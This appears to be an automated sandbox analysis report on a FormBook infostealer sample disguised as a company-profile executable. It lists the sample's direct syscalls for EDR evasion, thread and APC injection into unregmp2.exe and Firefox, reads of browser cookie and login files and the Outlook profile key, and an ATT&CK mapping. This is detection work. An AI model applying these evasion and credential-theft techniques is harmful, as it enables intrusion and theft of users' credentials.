              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01980BCB mov eax, dword ptr fs:[00000030h]0_2_01980BCB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01980BCB mov eax, dword ptr fs:[00000030h]0_2_01980BCB
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01960BCD mov eax, dword ptr fs:[00000030h]0_2_01960BCD
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01960BCD mov eax, dword ptr fs:[00000030h]0_2_01960BCD
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01960BCD mov eax, dword ptr fs:[00000030h]0_2_01960BCD
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198EBFC mov eax, dword ptr fs:[00000030h]0_2_0198EBFC
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01968BF0 mov eax, dword ptr fs:[00000030h]0_2_01968BF0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01968BF0 mov eax, dword ptr fs:[00000030h]0_2_01968BF0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01968BF0 mov eax, dword ptr fs:[00000030h]0_2_01968BF0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019ECBF0 mov eax, dword ptr fs:[00000030h]0_2_019ECBF0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0EBD0 mov eax, dword ptr fs:[00000030h]0_2_01A0EBD0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DEB1D mov eax, dword ptr fs:[00000030h]0_2_019DEB1D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DEB1D mov eax, dword ptr fs:[00000030h]0_2_019DEB1D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DEB1D mov eax, dword ptr fs:[00000030h]0_2_019DEB1D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DEB1D mov eax, dword ptr fs:[00000030h]0_2_019DEB1D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DEB1D mov eax, dword ptr fs:[00000030h]0_2_019DEB1D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DEB1D mov eax, dword ptr fs:[00000030h]0_2_019DEB1D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DEB1D mov eax, dword ptr fs:[00000030h]0_2_019DEB1D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DEB1D mov eax, dword ptr fs:[00000030h]0_2_019DEB1D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DEB1D mov eax, dword ptr fs:[00000030h]0_2_019DEB1D
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A28B28 mov eax, dword ptr fs:[00000030h]0_2_01A28B28
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A28B28 mov eax, dword ptr fs:[00000030h]0_2_01A28B28
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198EB20 mov eax, dword ptr fs:[00000030h]0_2_0198EB20
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198EB20 mov eax, dword ptr fs:[00000030h]0_2_0198EB20
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F6B40 mov eax, dword ptr fs:[00000030h]0_2_019F6B40
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019F6B40 mov eax, dword ptr fs:[00000030h]0_2_019F6B40
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A2AB40 mov eax, dword ptr fs:[00000030h]0_2_01A2AB40
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A08B42 mov eax, dword ptr fs:[00000030h]0_2_01A08B42
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A14B4B mov eax, dword ptr fs:[00000030h]0_2_01A14B4B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A14B4B mov eax, dword ptr fs:[00000030h]0_2_01A14B4B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0195CB7E mov eax, dword ptr fs:[00000030h]0_2_0195CB7E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0EB50 mov eax, dword ptr fs:[00000030h]0_2_01A0EB50
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01998A90 mov edx, dword ptr fs:[00000030h]0_2_01998A90
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196EA80 mov eax, dword ptr fs:[00000030h]0_2_0196EA80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196EA80 mov eax, dword ptr fs:[00000030h]0_2_0196EA80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196EA80 mov eax, dword ptr fs:[00000030h]0_2_0196EA80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196EA80 mov eax, dword ptr fs:[00000030h]0_2_0196EA80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196EA80 mov eax, dword ptr fs:[00000030h]0_2_0196EA80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196EA80 mov eax, dword ptr fs:[00000030h]0_2_0196EA80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196EA80 mov eax, dword ptr fs:[00000030h]0_2_0196EA80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196EA80 mov eax, dword ptr fs:[00000030h]0_2_0196EA80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0196EA80 mov eax, dword ptr fs:[00000030h]0_2_0196EA80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A34A80 mov eax, dword ptr fs:[00000030h]0_2_01A34A80
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01968AA0 mov eax, dword ptr fs:[00000030h]0_2_01968AA0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01968AA0 mov eax, dword ptr fs:[00000030h]0_2_01968AA0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019B6AA4 mov eax, dword ptr fs:[00000030h]0_2_019B6AA4
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01960AD0 mov eax, dword ptr fs:[00000030h]0_2_01960AD0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01994AD0 mov eax, dword ptr fs:[00000030h]0_2_01994AD0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01994AD0 mov eax, dword ptr fs:[00000030h]0_2_01994AD0
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019B6ACC mov eax, dword ptr fs:[00000030h]0_2_019B6ACC
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019B6ACC mov eax, dword ptr fs:[00000030h]0_2_019B6ACC
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019B6ACC mov eax, dword ptr fs:[00000030h]0_2_019B6ACC
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199AAEE mov eax, dword ptr fs:[00000030h]0_2_0199AAEE
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199AAEE mov eax, dword ptr fs:[00000030h]0_2_0199AAEE
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019ECA11 mov eax, dword ptr fs:[00000030h]0_2_019ECA11
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199CA38 mov eax, dword ptr fs:[00000030h]0_2_0199CA38
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01984A35 mov eax, dword ptr fs:[00000030h]0_2_01984A35
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01984A35 mov eax, dword ptr fs:[00000030h]0_2_01984A35
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0198EA2E mov eax, dword ptr fs:[00000030h]0_2_0198EA2E
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199CA24 mov eax, dword ptr fs:[00000030h]0_2_0199CA24
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A0EA60 mov eax, dword ptr fs:[00000030h]0_2_01A0EA60
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01966A50 mov eax, dword ptr fs:[00000030h]0_2_01966A50
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01966A50 mov eax, dword ptr fs:[00000030h]0_2_01966A50
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01966A50 mov eax, dword ptr fs:[00000030h]0_2_01966A50
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01966A50 mov eax, dword ptr fs:[00000030h]0_2_01966A50
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01966A50 mov eax, dword ptr fs:[00000030h]0_2_01966A50
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01966A50 mov eax, dword ptr fs:[00000030h]0_2_01966A50
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01966A50 mov eax, dword ptr fs:[00000030h]0_2_01966A50
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970A5B mov eax, dword ptr fs:[00000030h]0_2_01970A5B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01970A5B mov eax, dword ptr fs:[00000030h]0_2_01970A5B
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DCA72 mov eax, dword ptr fs:[00000030h]0_2_019DCA72
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_019DCA72 mov eax, dword ptr fs:[00000030h]0_2_019DCA72
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199CA6F mov eax, dword ptr fs:[00000030h]0_2_0199CA6F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199CA6F mov eax, dword ptr fs:[00000030h]0_2_0199CA6F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199CA6F mov eax, dword ptr fs:[00000030h]0_2_0199CA6F
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A28DAE mov eax, dword ptr fs:[00000030h]0_2_01A28DAE
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A28DAE mov eax, dword ptr fs:[00000030h]0_2_01A28DAE
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01A34DAD mov eax, dword ptr fs:[00000030h]0_2_01A34DAD
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01988DBF mov eax, dword ptr fs:[00000030h]0_2_01988DBF
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_01988DBF mov eax, dword ptr fs:[00000030h]0_2_01988DBF
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199CDB1 mov ecx, dword ptr fs:[00000030h]0_2_0199CDB1
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeCode function: 0_2_0199CDB1 mov eax, dword ptr fs:[00000030h]0_2_0199CDB1

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtClose: Direct from: 0x76EF2B6C
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeSection loaded: NULL target: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\z1companyProfileandproducts.exeSection loaded: NULL target: C:\Windows\SysWOW64\unregmp2.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: NULL target: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: NULL target: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\unregmp2.exeThread register set: target process: 5840Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\unregmp2.exeThread APC queued: target process: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeJump to behavior
              Source: C:\Program Files (x86)\IGJpExPNnXcSEeXRaVuSrgDXJqJxPQCnQOyMbAilNszWmExgWoMyhelWkvildEcHGKFunvWT\cAPvHN0KfrpQXKK.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: cAPvHN0KfrpQXKK.exe, 00000003.00000002.3347483337.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000003.00000000.2627843050.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000005.00000002.3347713495.0000000001691000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: cAPvHN0KfrpQXKK.exe, 00000003.00000002.3347483337.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000003.00000000.2627843050.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000005.00000002.3347713495.0000000001691000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: cAPvHN0KfrpQXKK.exe, 00000003.00000002.3347483337.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000003.00000000.2627843050.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000005.00000002.3347713495.0000000001691000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: cAPvHN0KfrpQXKK.exe, 00000003.00000002.3347483337.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000003.00000000.2627843050.0000000001AB1000.00000002.00000001.00040000.00000000.sdmp, cAPvHN0KfrpQXKK.exe, 00000005.00000002.3347713495.0000000001691000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.z1companyProfileandproducts.exe.d20000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3347455545.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3347408505.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2712122169.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3346834003.0000000000890000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2710662853.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2712196168.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3347720640.0000000004650000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\unregmp2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.z1companyProfileandproducts.exe.d20000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.3347455545.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3347408505.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2712122169.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3346834003.0000000000890000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2710662853.0000000000D21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2712196168.0000000003200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3347720640.0000000004650000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		312
              Process Injection              		2
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		121
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		312
              Process Injection              		LSASS Memory2
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin Shares1
